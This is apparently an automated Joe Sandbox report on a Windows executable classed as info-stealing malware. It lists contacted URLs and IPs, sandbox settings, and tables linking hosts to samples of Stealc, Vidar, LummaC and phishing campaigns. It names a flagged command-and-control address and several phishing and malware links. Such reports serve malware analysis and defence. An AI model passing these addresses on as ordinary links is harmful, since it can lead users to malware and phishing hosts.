https://permanently-removed.invalid/v1/issuetoken	msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5371	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/reauth/v1beta/users/	msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/9v	chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Zw	chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7556	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	msedge.exe, 0000000D.00000002.1510501728.000015280237C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.15.dr	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	HrxOpVxK5d.exe, 00000000.00000002.1787677967.000000001D260000.00000004.00000020.00020000.00000000.sdmp, IIJEBFCFIJJJEBGDBAKE.0.dr	false		high
https://srtb.msn.cn/	2cc80dabc69f58b6_1.15.dr	false		high
https://chrome.google.com/webstore/	manifest.json.15.dr	false		high
https://assets.msn.cn/resolver/	2cc80dabc69f58b6_1.15.dr	false		high
https://google-ohttp-relay-join.fastly-edge.com/kw	chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://browser.events.data.msn.com/	2cc80dabc69f58b6_1.15.dr	false		high
https://permanently-removed.invalid/RotateBoundCookies	msedge.exe, 0000000D.00000003.1432162635.0000152802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432521790.0000152802474000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6692	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/258207403	msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
http://anglebug.com/3625	msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.live.com/mail/0/	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
http://anglebug.com/3624	msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5007	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3862	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.rs/getrandom#nodejs-es-module-support	HrxOpVxK5d.exe, HrxOpVxK5d.exe, 00000000.00000003.1260620035.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1799365474.000000006D8B1000.00000002.00000001.01000000.00000007.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, HrxOpVxK5d.exe, 00000000.00000002.1775489473.0000000004900000.00000040.00001000.00020000.00000000.sdmp, chrome.dll.0.dr	false		high
https://ntp.msn.com/edge/ntp	000003.log9.15.dr, 2cc80dabc69f58b6_1.15.dr	false		high
https://assets.msn.com/resolver/	2cc80dabc69f58b6_1.15.dr	false		high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000008.00000003.1322526154.00000F9C02F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1338398569.00000F9C02F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1323176156.00000F9C026AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1325961701.00000F9C02F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1349125008.00000F9C02EB0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Ex	chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4836	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://77.220.212.32/eb51242cada87444.phpecoin	HrxOpVxK5d.exe, 00000000.00000002.1775137644.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29	chrome.exe, 00000008.00000003.1348570097.00000F9C034FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tidal.com/	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
https://msn.com/	msedge.exe, 0000000D.00000002.1510846002.0000152802514000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4384	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/uw	chrome.exe, 00000008.00000003.1350723908.00000F9C03640000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350697241.00000F9C03638000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1350671886.00000F9C03634000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gaana.com/	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
https://mail.google.com/mail/?tab=rm&ogbl	chrome.exe, 00000008.00000003.1362826974.00000F9C03EA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1354718747.00000F9C03D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1355376953.00000F9C03DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1354274186.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/VPi	chrome.exe, 00000008.00000003.1314632078.0000565000684000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.live.com/mail/compose?isExtension=true	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
http://anglebug.com/3970	chrome.exe, 00000008.00000003.1321481804.00000F9C02590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1321574706.00000F9C02CA0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1432656690.000015280255C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true	c72ded0e-aca6-4312-af7b-8b5b2bcdd7f3.tmp.15.dr	false		high
https://apis.google.com	chrome.exe, 00000008.00000003.1355304187.00000F9C03DB8000.00000004.00000800.00020000.00000000.sdmp, chromecache_467.11.dr, chromecache_465.11.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.198.7.182	unknown	United States	20940	AKAMAI-ASN1EU	false
23.198.7.184	unknown	United States	20940	AKAMAI-ASN1EU	false
172.217.18.14	play.google.com	United States	15169	GOOGLEUS	false
18.244.18.27	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
216.58.206.36	www.google.com	United States	15169	GOOGLEUS	false
20.125.209.212	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.89.178.27	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.113.132	unknown	United States	15169	GOOGLEUS	false
23.218.232.185	unknown	United States	24835	RAYA-ASEG	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
13.107.246.57	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.198.7.177	unknown	United States	20940	AKAMAI-ASN1EU	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
3.167.152.61	unknown	United States	16509	AMAZON-02US	false
13.91.96.185	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
20.99.185.48	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
77.220.212.32	unknown	Ukraine	204601	ON-LINE-DATAServerlocation-NetherlandsDrontenNL	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.38.189.81	unknown	United States	16625	AKAMAI-ASUS	false
142.250.186.142	plus.l.google.com	United States	15169	GOOGLEUS	false
23.221.22.215	unknown	United States	20940	AKAMAI-ASN1EU	false

Private

IP
192.168.2.7
192.168.2.23
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1552559
Start date and time:	2024-11-09 02:46:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	HrxOpVxK5d.exe renamed because original name is a hash value
Original Sample Name:	c4ac7a7ee7a9529b0148d9a64c43801b.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@64/304@24/25
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 87 Number of non-executed functions: 200
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.195, 142.250.185.206, 66.102.1.84, 34.104.35.123, 142.250.184.227, 142.250.184.234, 142.250.186.42, 142.250.186.106, 142.250.186.138, 216.58.206.42, 142.250.186.170, 172.217.18.10, 142.250.185.106, 142.250.184.202, 172.217.16.138, 172.217.16.202, 142.250.181.234, 172.217.18.106, 142.250.74.202, 216.58.206.74, 216.58.212.170, 199.232.214.172, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 142.250.186.110, 13.107.6.158, 2.19.126.145, 2.19.126.152, 4.231.66.184, 88.221.110.195, 88.221.110.179, 2.23.209.130, 2.23.209.149, 2.23.209.187, 2.23.209.182, 2.23.209.133, 13.74.129.1, 204.79.197.237, 13.107.21.237, 2.23.209.45, 2.23.209.13, 2.23.209.3, 2.23.209.59, 2.23.209.51, 2.23.209.20, 2.23.209.28, 2.23.209.52, 2.23.209.57, 72.21.81.240, 108.141.15.7, 2.19.126.157, 2.19.126.151, 20.42.65.92, 104.208.16.94, 142.250.113.94
Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, prod-agic-we-6.westeurope.cloudapp.azure.com, clientservices.googleapis.com, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, onedsblobprdcus16.centralus.cloudapp.azure.com, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, wildcardtlu-ssl.azureedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, edgedl.me.gvt1.com, c.bing.com, 4.8.2.0.0.0.0.0.0
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
22:33:56	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
23.198.7.182	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	https://neon.ly/c2df7a96-7e7b-434f-8fbd-e7d0667e7df5#cl/4534_md/1110/5173/689/14/544786	Get hash	malicious	Phisher	Browse
	https://vqrvoca8x6h374fj71x.blob.core.windows.net/vqrvoca8x6h374fj71x/url.html#cl/7671_md/12/613/2075/415/1157811	Get hash	malicious	Phisher	Browse
20.125.209.212	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse
	s6QYhBcJtc.exe	Get hash	malicious	Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	vMRlWtVCEN.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
23.198.7.184	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	DbMBWMxoNv.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	http://track.senderbulk.com/9145172/c?p=t_1VEj-jtdCupKDOh1UJ15hIRR1JywmpwhIYXugQ8652sS-HwhrykvIupJ1sV0083zN2qzdnhsEwJGDUDZ1OyR83lYJTkJdb1ldVrXBgZet3hXPVMDZaSfsMTO9r_7_gsxsZuAYF3HDczbqi9bL16p9EqvSQURoSr8h9p02Jz24yKdADk5HJYxFc56zk03c1	Get hash	malicious	Unknown	Browse
	https://neon.ly/c2df7a96-7e7b-434f-8fbd-e7d0667e7df5#cl/4534_md/1110/5173/689/14/544786	Get hash	malicious	Phisher	Browse
13.89.178.27	INV00663.docx	Get hash	malicious	HTMLPhisher	Browse
	Axactor Microsoft - Introduksjonsm#U00f8te.msg	Get hash	malicious	EvilProxy	Browse
	EXTERNALInvoice 3388 from Mazzitti Sullivan EAP.msg	Get hash	malicious	Unknown	Browse
	PROPOSTA CONTRATTUALE.msg	Get hash	malicious	HTMLPhisher	Browse
	Order PO Document.docx	Get hash	malicious	HTMLPhisher	Browse
	EXTERN Zahlungsbest#U00e4tigung.msg	Get hash	malicious	CVE-2024-21412	Browse
	https://ridgecomm-my.sharepoint.com/:f:/g/personal/mike_dickson_ridgecommunicate_com/EoIXqm_rhmNPgUmdh9oGxVYBOC8z-wLp52vmISycophX2A?e=pxBR5z	Get hash	malicious	HTMLPhisher	Browse
	Copy of AttackSim_Uer_Guide_v1.2.docx	Get hash	malicious	Lsass Dumper, Mimikatz, Phisher, Trickbot	Browse
	Reference ID6f5f047b6cdf41716e164ec64879e463.eml	Get hash	malicious	HTMLPhisher	Browse
	https://qrco.de/bfDZrd	Get hash	malicious	HTMLPhisher	Browse
18.244.18.27	https://www.canva.com/design/DAGVsvWsNbI/iZzU0BNPZvRGZSXgumDARw/view?utm_content=DAGVsvWsNbI&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse
	JMFoyLSCjP.exe	Get hash	malicious	Stealc, Vidar	Browse
	https://t.co/WUjzOGRMNx	Get hash	malicious	Unknown	Browse
	DbMBWMxoNv.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	Invoice Ref ++_Donuts.html	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chrome.cloudflare-dns.com	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	172.64.41.3
	s6QYhBcJtc.exe	Get hash	malicious	Stealc	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe	Get hash	malicious	GuLoader, Remcos	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	cOOhDuNWt7.lnk	Get hash	malicious	Ducktail	Browse	162.159.61.3
	SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnk	Get hash	malicious	Ducktail	Browse	172.64.41.3
	https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://www.capcut.com/download-guidance?download_url=https%3A%2F%2Flf16-capcut.faceulv.com%2Fobj%2Fcapcutpc-packages-us%2Finstaller%2Fcapcut_capcutpc_0_1.2.6_installer.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	94.245.104.56
	s6QYhBcJtc.exe	Get hash	malicious	Stealc	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe	Get hash	malicious	GuLoader, Remcos	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	vMRlWtVCEN.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
sb.scorecardresearch.com	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	18.245.60.53
	s6QYhBcJtc.exe	Get hash	malicious	Stealc	Browse	18.239.83.98
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.245.60.107
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.244.18.38
	https://www.canva.com/design/DAGVsvWsNbI/iZzU0BNPZvRGZSXgumDARw/view?utm_content=DAGVsvWsNbI&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	18.244.18.27
	RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exe	Get hash	malicious	GuLoader, Remcos	Browse	18.244.18.27
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.244.18.122
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.245.60.76
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	52.222.169.99
	vMRlWtVCEN.exe	Get hash	malicious	Stealc, Vidar	Browse	18.244.18.122

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://kh7hk7t867r6.s3.us-east-2.amazonaws.com/gyg87t8f7g7ff75d5/huu7t76r5trf5e45e/index.html	Get hash	malicious	Unknown	Browse	3.5.132.20
	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	18.245.60.53
	https://bitcoinwisdom.com/these-workers-found-a-giant-snake-you-wont-believe-what-they-found-inside/2/?utm_source=taboola&utm_term=yahoo-aol-mail&utm_medium=cpc&utm_campaign=Snake+US.D_snake&cost=0.13&tblci=GiAmoZnDSKA9Rcvf4CX7BxL2zvlH6pqfvE-XRuuUPfhj0iCA4Woo2fPniM_m2u-_ATDYl18	Get hash	malicious	LiteHTTP Bot	Browse	3.165.113.38
	https://eu-west-1.protection.sophos.com/?d=online-statements.site&u=aHR0cHM6Ly93d3cub25saW5lLXN0YXRlbWVudHMuc2l0ZS9zaWduaW4_dD1leUpoYkdjaU9pSklVekkxTmlKOS5leUowY21GamEybHVaMTkwYjJ0bGJpSTZJalZqWXpoa01UQmxMVEZpTVRNdE5EQTJaQzA1TURVMkxURXlZVFk0WVRSa05EbGhNQ0lzSW1ObGJHd2lPaUpvZEhSd2N6b3ZMM0ZuWW1aM2IzYzJNR1l1WlhobFkzVjBaUzFoY0drdWRYTXRkMlZ6ZEMweUxtRnRZWHB2Ym1GM2N5NWpiMjB2Y0hKdlpDOWhjR2t2Y0docGMyaHBibWRqWVcxd1lXbG5iaUlzSW1OaGJYQmhhV2R1WDNSdmEyVnVJam9pTm1JM05XSTNNRGt0TkRWaVl5MDBOVFpqTFdJeU1HWXRZalJpTXpVeE9UQmxaRFF3SWl3aWRHVnpkRjkwYjJ0bGJpSTZabUZzYzJVc0ltVjRkR1Z5Ym1Gc1gzUnlZV2x1YVc1bklqcG1ZV3h6WlN3aVpHbHlaV04wWDJSbGJHbDJaWEo1SWpwMGNuVmxMQ0pwWVhRaU9qRTNNekV3T0RReE56a3NJbWx6Y3lJNkltaDBkSEJ6T2k4dllYQndMbkJvYVhOb2RHaHlaV0YwTG1OdmJTSXNJbVY0Y0NJNk1UY3pPRGcyTURFM09YMC5qRlY0OGJMNkJuVXNUUWp3ME84MHpaTWZkWXp1X1RiMmoxYTlfYUMwZlhv&p=m&i=NjEwYjE2Y2U0Zjc0MWMwZTk2MmNlZjk5&t=bWhSZnFlc2Z5WlZLRSt2ZE51Wnk0S0FPcng1NStjNWNXYlFKYWNoMVVQUT0=&h=94894c2300ca4179bc6a5fad2b6f7320&s=AVNPUEhUT0NFTkNSWVBUSVbGzig1wPRd_1oljM8LJU60Hq9VlWBTQiABDwLsqafDog	Get hash	malicious	HTMLPhisher	Browse	18.239.94.33
	s6QYhBcJtc.exe	Get hash	malicious	Stealc	Browse	18.239.83.98
	.i.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	http://go.stoptrump.io/11087	Get hash	malicious	Unknown	Browse	18.245.86.8
	https://atuiqe.com/so/99PC8OXJg/c?w=QkhD4F_29qlP63xGZtdrzJ7YP7_meHXlHcBWS8oSJek.eyJ1IjoiaHR0cHM6Ly93d3cuYXR1aXFlLmNvbS8iLCJtIjoibWFpbCIsImMiOiJhNmQ4NTViMi04ODFjLTQ4ZDItYmIwMC0wYzNhZGEyOTdhNTYifQ	Get hash	malicious	Unknown	Browse	99.86.4.79
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	3.168.2.47
	https://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36	Get hash	malicious	Unknown	Browse	99.80.131.149
MICROSOFT-CORP-MSN-AS-BLOCKUS	fK4N7E6bFV.exe	Get hash	malicious	Remcos	Browse	13.95.31.18
	file.exe	Get hash	malicious	LummaC Stealer, Stealc	Browse	94.245.104.56
	ACH invoice 4088-27271.msg	Get hash	malicious	Unknown	Browse	104.47.65.28
	INVOICE DUE.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.45
	s6QYhBcJtc.exe	Get hash	malicious	Stealc	Browse	51.105.71.137
